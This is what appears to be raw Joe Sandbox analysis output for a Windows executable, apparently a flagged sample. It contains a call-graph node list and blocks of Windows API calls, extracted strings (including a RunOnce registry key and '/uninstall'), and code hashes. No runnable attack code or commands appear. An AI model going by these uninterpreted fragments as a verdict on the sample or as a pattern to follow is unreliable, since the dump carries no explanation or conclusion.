52261->52266 52266->52260 52266->52261 52268 4c0f00 26 API calls 
52266->52268 52269 4c058a 52266->52269 52270 358810 24 API calls 52266->52270 52273 358190 25 API calls 52266->52273 52274 35cd80 25 API calls 52266->52274 52282 4c0279 52266->52282 52306 4c15a0 52266->52306 52340 4620b0 25 API calls 52266->52340 52341 35ee10 25 API calls 52266->52341 52342 4be850 11 API calls __Init_thread_footer 52266->52342 52343 466fc0 25 API calls 2 library calls 52266->52343 52345 470790 25 API calls 2 library calls 52266->52345 52346 4c1a70 25 API calls 52266->52346 52347 4c1370 25 API calls std::_Throw_Cpp_error 52266->52347 52348 4c1940 52266->52348 52353 3826a0 24 API calls 52266->52353 52268->52266 52271 5252ff std::_Throw_Cpp_error 24 API calls 52269->52271 52270->52266 52272 4c058f 52271->52272 52273->52266 52274->52266 52280 358810 24 API calls 52280->52282 52282->52266 52282->52280 52344 4bf2e0 46 API calls 2 library calls 52282->52344 52286 35cd91 52283->52286 52287 35cdcd 52283->52287 52284 35ce81 52374 358760 RaiseException 52284->52374 52286->52210 52287->52284 52289 358700 25 API calls 52287->52289 52290 35ce16 52289->52290 52291 35ce65 52290->52291 52292 5252ff std::_Throw_Cpp_error 24 API calls 52290->52292 52291->52210 52292->52284 52293->52223 52294->52223 52296 359c10 52295->52296 52296->52296 52299 359c30 52296->52299 52302 358760 RaiseException 52296->52302 52299->52235 52300->52240 52301->52249 52303->52254 52304->52257 52305->52257 52307 4c1797 52306->52307 52308 4c15f0 52306->52308 52359 357b70 RaiseException 52307->52359 52310 4c1792 52308->52310 52314 4c163c 52308->52314 52315 4c1663 52308->52315 52358 3586e0 25 API calls std::_Throw_Cpp_error 52310->52358 52312 4c1738 52313 5252ff std::_Throw_Cpp_error 24 API calls 52312->52313 52339 4c175d 52312->52339 52316 4c17a1 52313->52316 52314->52310 52317 4c1647 52314->52317 52318 51fea9 3 API calls 52315->52318 52321 4c164d 52315->52321 52360 4c1070 24 API calls 52316->52360 52320 51fea9 3 API calls 52317->52320 52318->52321 52320->52321 52321->52312 52323 4c1940 25 API 
calls 52321->52323 52322 4c17ad 52361 376690 24 API calls std::_Throw_Cpp_error 52322->52361 52325 4c169f 52323->52325 52327 4c16fe 52325->52327 52328 4c16b1 52325->52328 52326 4c17bb 52329 521bfa std::_Throw_Cpp_error RaiseException 52326->52329 52355 4c1870 25 API calls 52327->52355 52333 4c16e4 52328->52333 52336 4c1940 25 API calls 52328->52336 52331 4c17c4 52329->52331 52332 4c1709 52356 4c1870 25 API calls 52332->52356 52354 4c1070 24 API calls 52333->52354 52336->52328 52337 4c16f3 52337->52339 52357 4c1070 24 API calls 52337->52357 52339->52266 52340->52266 52341->52266 52342->52266 52343->52266 52344->52282 52345->52266 52346->52266 52347->52266 52349 51fea9 3 API calls 52348->52349 52350 4c1989 52349->52350 52362 4c1b70 52350->52362 52353->52266 52354->52337 52355->52332 52356->52337 52357->52312 52358->52307 52360->52322 52361->52326 52363 4c1bb2 52362->52363 52373 4c19b4 52362->52373 52364 51fea9 3 API calls 52363->52364 52365 4c1bd4 52364->52365 52366 357690 25 API calls 52365->52366 52367 4c1bea 52366->52367 52368 357690 25 API calls 52367->52368 52369 4c1bfa 52368->52369 52370 4c1b70 25 API calls 52369->52370 52371 4c1c4b 52370->52371 52372 4c1b70 25 API calls 52371->52372 52372->52373 52373->52266 52375 523be0 52379 523bfe ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 52375->52379 52376 523c7e _ValidateLocalCookies 52378 523d07 _ValidateLocalCookies 52388 524ef7 7 API calls 2 library calls 52378->52388 52379->52376 52387 524ec0 RtlUnwind 52379->52387 52381 523d43 52382 523d47 52381->52382 52389 521bac 52381->52389 52384 523d4f 52385 523d5a 52384->52385 52397 524f33 DeleteCriticalSection 52384->52397 52387->52378 52388->52381 52398 524c57 52389->52398 52391 521bb6 52392 521bc1 52391->52392 52404 524d08 6 API calls ___vcrt_FlsGetValue 52391->52404 52392->52384 52394 521bcf 52395 521bdc 52394->52395 52405 521bdf 6 API calls ___vcrt_FlsFree 52394->52405 52395->52384 52397->52382 52406 524b6c 52398->52406 52401 
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C,?,?,?), ref: 00481B65
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00481C60
                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D,?,?,?), ref: 00481D60
                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00481E45
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00481F8C
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D,?,?,?), ref: 00482072
                                                    • __Init_thread_footer.LIBCMT ref: 004820E6
                                                    • LoadLibraryW.KERNEL32(shfolder.dll,?,?,?), ref: 004820FC
                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0048212E
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 0048219C
                                                    • SHGetMalloc.SHELL32(00000000), ref: 004821B5
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Directory$FolderPathWindows$AddressAllocateFileFromHeapInit_thread_footerLibraryListLoadLocationMallocModuleNameProcSpecialSystem
                                                    • String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                    • API String ID: 2816963309-2142986682
                                                    • Opcode ID: a4eda41a791da42c7e5940480ab8dbeab5e0444790aa4b5bcd92bd4f57186d8b
                                                    • Instruction ID: 14a9940dfdc3f9cea0c819abb83329cb9e8d3fe1b955e4a83a2b099a9ee9275a
                                                    • Opcode Fuzzy Hash: a4eda41a791da42c7e5940480ab8dbeab5e0444790aa4b5bcd92bd4f57186d8b
                                                    • Instruction Fuzzy Hash: 60321470A006058BDB24EF24CC44BBEB7B5FF51300F14469ED9069B3A1EB759E86DB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • GetTickCount.KERNEL32 ref: 00486874
                                                    • __Xtime_get_ticks.LIBCPMT ref: 0048687C
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004868C6
                                                    • __Init_thread_footer.LIBCMT ref: 00486AB1
                                                    • GetCurrentProcess.KERNEL32(00000008,?,D13B3340), ref: 00486CA8
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00486CAF
                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00486CDE
                                                    • CloseHandle.KERNEL32(00000000), ref: 00486CF3
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                      • Part of subcall function 00471DA0: __Init_thread_footer.LIBCMT ref: 00471E16
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004874B5
                                                    • CreateThread.KERNEL32 ref: 004874F0
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00487523
                                                      • Part of subcall function 0048A490: GetCurrentProcess.KERNEL32(?,D13B3340), ref: 0048A4F9
                                                      • Part of subcall function 0048A490: IsWow64Process.KERNEL32(00000000), ref: 0048A500
                                                      • Part of subcall function 0048A490: _wcsrchr.LIBVCRUNTIME ref: 0048A581
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Process$Init_thread_footer$CreateCurrentHeapToken$AllocateCloseCountEventFindHandleInformationObjectOpenResourceSingleThreadTickUnothrow_t@std@@@WaitWow64Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
                                                    • String ID: /uninstall$VersionString$\/:*?"<>|$\\?\$nT$c$c
                                                    • API String ID: 2945862171-3201994613
                                                    • Opcode ID: 806411e6c38636708248eab5b8204ed6195a21a088df9aa525dfbf491abfa630
                                                    • Instruction ID: c2c591f6b347215702b72d4e05983fbc50253ba8dcfdada575b3fa5eda95d3ad
                                                    • Opcode Fuzzy Hash: 806411e6c38636708248eab5b8204ed6195a21a088df9aa525dfbf491abfa630
                                                    • Instruction Fuzzy Hash: 44B2F330A00605DFDB14EFA8C854BAEBBB5FF05314F24865AE815AB3D1DB78AD05CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,76B7FB40), ref: 00493A61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$CloseHandleHeapProcess
                                                    • String ID: <3[$<3[$<3[$<3[$<3[
                                                    • API String ID: 2534622057-2247405043
                                                    • Opcode ID: fc5a52d16b7bfa167f24cc580a2adac33d204892cda2eda906712b066c7c687e
                                                    • Instruction ID: da80b2b949335a3a4acc5da610ea5b4048bb66a897e9f3b85ba26c66c21ddde3
                                                    • Opcode Fuzzy Hash: fc5a52d16b7bfa167f24cc580a2adac33d204892cda2eda906712b066c7c687e
                                                    • Instruction Fuzzy Hash: 69526B709016589BDB26CF68C944B9ABBF8AF05305F1481EEE408AB291DB789F84CF54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0046E7D8
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0046E7E5
                                                    • GetLastError.KERNEL32 ref: 0046E7EF
                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000000FF), ref: 0046E819
                                                    • GetLastError.KERNEL32 ref: 0046E81F
                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000000FF,000000FF,000000FF,000000FF), ref: 0046E845
                                                    • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0046E878
                                                    • EqualSid.ADVAPI32(00000000,?), ref: 0046E887
                                                    • FreeSid.ADVAPI32(?), ref: 0046E896
                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0046E8D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
                                                    • String ID: <3[
                                                    • API String ID: 2037597787-3672254634
                                                    • Opcode ID: 98b12e3fa9e9e89a7924cad45ceb80b6c2296f5b8e862b80f2ef3b9b219eb994
                                                    • Instruction ID: 42ff0739cfbdc08f4b1e2d6d1a5c0010d58dda76eb03289b33f443c975a5afae
                                                    • Opcode Fuzzy Hash: 98b12e3fa9e9e89a7924cad45ceb80b6c2296f5b8e862b80f2ef3b9b219eb994
                                                    • Instruction Fuzzy Hash: 14413775900209AFDF109FA5CC48BEEBBF9FF09314F144015E511B3290EB799A08DBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 004AACC5
                                                    • GetLastError.KERNEL32 ref: 004AACCB
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 004AAD13
                                                    • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 004AAD49
                                                    • GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 004AAD93
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,D13B3340), ref: 004AAFC8
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 004AB202
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 004AB338
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$EnvironmentNameUserVariable$ErrorLast
                                                    • String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
                                                    • API String ID: 938064350-4079418357
                                                    • Opcode ID: 073b3bfe68c5eda5a602da8665ce063f3c1127d2189311b0c7b233f0176fee3c
                                                    • Instruction ID: c9d319ddfb8c2fbfb2fbf2383d5add1e5ca7276df2a932f345f50829d5978c68
                                                    • Opcode Fuzzy Hash: 073b3bfe68c5eda5a602da8665ce063f3c1127d2189311b0c7b233f0176fee3c
                                                    • Instruction Fuzzy Hash: E1226D70D00248DFDB14DFA8CD99BEEBBB5EF15304F208259E415B7291DB786A88CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00495F3E,?,?,?,?,?,?), ref: 0051FA18
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA1F
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0051FA65
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA6C
                                                      • Part of subcall function 0051F8B1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8D5
                                                      • Part of subcall function 0051F8B1: HeapAlloc.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free
                                                    • String ID: `{5
                                                    • API String ID: 1864747095-770602540
                                                    • Opcode ID: fe064b8df90578fe21a304791aa4c06884713a5f047621ef74cf36ee831b9411
                                                    • Instruction ID: cf105da142911b2752de2ccb7f03346f1ed5574e514bfaf405ba0bd55dec35b3
                                                    • Opcode Fuzzy Hash: fe064b8df90578fe21a304791aa4c06884713a5f047621ef74cf36ee831b9411
                                                    • Instruction Fuzzy Hash: 57F0E973A44B1297E7202B787C0CABB3DA5BFD1791B064538F54AC6250EF34D8866760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0049E2CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DiskFreeSpace
                                                    • String ID: \$\$\
                                                    • API String ID: 1705453755-3791832595
                                                    • Opcode ID: 2ef8875cbd88dad16717ac9397a1c18ff5b059e0715c5450f8a468c3b1925e59
                                                    • Instruction ID: 080cbf59a0f646f88ffee9a8fa672f3c0e694b736c2966157878bb163c18382a
                                                    • Opcode Fuzzy Hash: 2ef8875cbd88dad16717ac9397a1c18ff5b059e0715c5450f8a468c3b1925e59
                                                    • Instruction Fuzzy Hash: B941D462E14311C6CF30DF26C444AABBBE8FF95354F554A7FE8C893240E729998583CA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0042A671
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,0057CDED,000000FF), ref: 0042A744
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                    • String ID: UxTheme.dll
                                                    • API String ID: 2586271605-352951104
                                                    • Opcode ID: c382e29672fe28bc5858b2ef50a094f08d9b4f78795f3a98351029c7f80e3c54
                                                    • Instruction ID: 6981a994a7db3c34127491376069d68cb7627c8d54645f627b25cf610b2f6084
                                                    • Opcode Fuzzy Hash: c382e29672fe28bc5858b2ef50a094f08d9b4f78795f3a98351029c7f80e3c54
                                                    • Instruction Fuzzy Hash: A4A189B0600645EFE714CF64C818B9ABBF4FF04318F24865ED8199B781D7BAA618CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0046CA3D
                                                    • FindClose.KERNEL32(00000000), ref: 0046CA9C
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$AllocateCloseFileFirstHeap
                                                    • String ID:
                                                    • API String ID: 1673784098-0
                                                    • Opcode ID: 25a13dd7504da530a3e9dd4d7a122ca6e4579a77c6dbd1ee9738f2aea7c33eb9
                                                    • Instruction ID: 52bd5e839f1e789da4bc4293e30b9fa5014057b9afce039fe6e3cbe1955e0788
                                                    • Opcode Fuzzy Hash: 25a13dd7504da530a3e9dd4d7a122ca6e4579a77c6dbd1ee9738f2aea7c33eb9
                                                    • Instruction Fuzzy Hash: FE31C1709042189FDB24DF94C888BBAB7B4FF48324F20429ED95593380E7755944CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,D13B3340,D13B3340,?,?,?,?,00000000), ref: 004AC379
                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,D13B3340,D13B3340,?,?,?,?,00000000,00594595), ref: 004AC39A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Create$FileNamedPipe
                                                    • String ID:
                                                    • API String ID: 1328467360-0
                                                    • Opcode ID: 6eb9ba16bd35e30fc697db0ab61cd187dabc05d793a94088f135e383fa739b05
                                                    • Instruction ID: fb0448f220d7766000ba4a089fd389e755a53453d07de23d42f59d7ccd5a2ce4
                                                    • Opcode Fuzzy Hash: 6eb9ba16bd35e30fc697db0ab61cd187dabc05d793a94088f135e383fa739b05
                                                    • Instruction Fuzzy Hash: FF310532A44745AFD720CF14CC05B9ABBA4EB11720F10C66EF9695B2D0DB75A900CB44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __set_se_translator.LIBVCRUNTIME ref: 0038B0C8
                                                    • SetUnhandledExceptionFilter.KERNEL32(0046B960), ref: 0038B0DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled__set_se_translator
                                                    • String ID:
                                                    • API String ID: 2480343447-0
                                                    • Opcode ID: 75b93f11f9a8abca4a3824bd061b7d540a3ea794519aa75ef849d490e3cb6f97
                                                    • Instruction ID: a269fba4dce57f3072b7531e8e35b16a32e4842ea57f92f0e17c1fa69a42fe9d
                                                    • Opcode Fuzzy Hash: 75b93f11f9a8abca4a3824bd061b7d540a3ea794519aa75ef849d490e3cb6f97
                                                    • Instruction Fuzzy Hash: 62E02662A002007BD720A360AC49F5B7F64EBB2710F084456F600A32A1D7755485C7F3
                                                    Uniqueness

